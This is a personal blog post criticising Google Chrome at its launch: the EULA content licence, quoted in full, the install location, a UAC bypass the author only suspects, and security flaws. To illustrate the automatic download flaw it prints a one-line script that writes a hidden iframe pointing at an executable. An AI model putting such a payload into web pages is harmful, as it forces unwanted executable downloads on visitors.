Chrome? Nah, I’ll pass

You must have heard of Chrome by now – the brand spanking new browser from Google. If you think it was the best thing since sliced bread you need to wake up and smell the fish.

For me the main deal breaker is the EULA they have for Chrome. As per the EULA anything you use to upload, browse, etc using Chrome you are giving Google the right a perpetual, irrevocable, worldwide, royalty-free and non-exclusive licence to reproduce, adapt, modify, translate, publish, publicly perform, publicly display and distribute any Content that you submit, post or display on or through the Services.

This means anything work related I do – something as simple as searching the intranet to something more sensitive as responding to an RFP can be posted or displayed by Google. Needless to say most of us won’t be using this at work. Here is the full Section 11 from the EULA:

11. Content licence from you

11.1 You retain copyright and any other rights that you already hold in Content that you submit, post or display on or through the Services. By submitting, posting or displaying the content, you give Google a perpetual, irrevocable, worldwide, royalty-free and non-exclusive licence to reproduce, adapt, modify, translate, publish, publicly perform, publicly display and distribute any Content that you submit, post or display on or through the Services. This licence is for the sole purpose of enabling Google to display, distribute and promote the Services and may be revoked for certain Services as defined in the Additional Terms of those Services.

11.2 You agree that this licence includes a right for Google to make such Content available to other companies, organisations or individuals with whom Google has relationships for the provision of syndicated services and to use such Content in connection with the provision of those services.

11.3 You understand that Google, in performing the required technical steps to provide the Services to our users, may (a) transmit or distribute your Content over various public networks and in various media; and (b) make such changes to your Content as are necessary to conform and adapt that Content to the technical requirements of connecting networks, devices, services or media. You agree that this licence shall permit Google to take these actions.

11.4 You confirm and warrant to Google that you have all the rights, power and authority necessary to grant the above licence.

So whenever Google releases the new-uber-cool hammer, this is what it will look like:

google hammer

Of course, there is a big backlash on this and there is some talk from Google on changing this. I wonder how quickly they forgot their “Don’t do Evil” mantra?

My second beef was when this is installed why is it in some obscure location such as AppData\Local\Global (e.g. on Vista this will be installed at C:\Users\%userprofile%\AppData\Local\Google\Chrome\Application) – what is wrong with something like %SYSTEM%\Google\Chrome? Of course this causes more interesting issues if more than one users use the same computer.

The third issue while is related to installation and is a little different. Why does this bypass the Windows UAC? No matter what the negative press on UAC, it is good and should not be bypassed. Maybe this is some new bug on UAC? (I am speculating at this point mind you, I have not had time to check it out in detail).

Security is the next problem. Apparently there is an automatic file download exploit and a carpet bombing flaw. For example the file download exploit can look something like:

<script> document.write(‘<iframe src=”http://www.example.com/hello.exe” frameborder=”0″ width=”0″ height=”0″>’); </script>

On the positive sides, there are some cool features such as the hidden features where you can see some interesting things such as dns details, histograms, network diags, etc. Here is a list of some of the commands available:

  • about:histograms
  • about:dns
  • about:stats
  • about:network
  • about:plugins

Lastly, try typing “evil:%” (without quotes) and see what happens! Smile

Published by

Amit Bahree

This blog is my personal blog and while it does reflect my experiences in my professional life, this is just my thoughts. Most of the entries are technical though sometimes they can vary from the wacky to even political – however that is quite rare. Quite often, I have been asked what’s up with the “gibberish” and the funny title of the blog? Some people even going the extra step to say that, this is a virus that infected their system (ahem) well. [:D] It actually is quite simple, and if you have still not figured out then check out this link – whats in a name?

Leave a Reply

This site uses Akismet to reduce spam. Learn how your comment data is processed.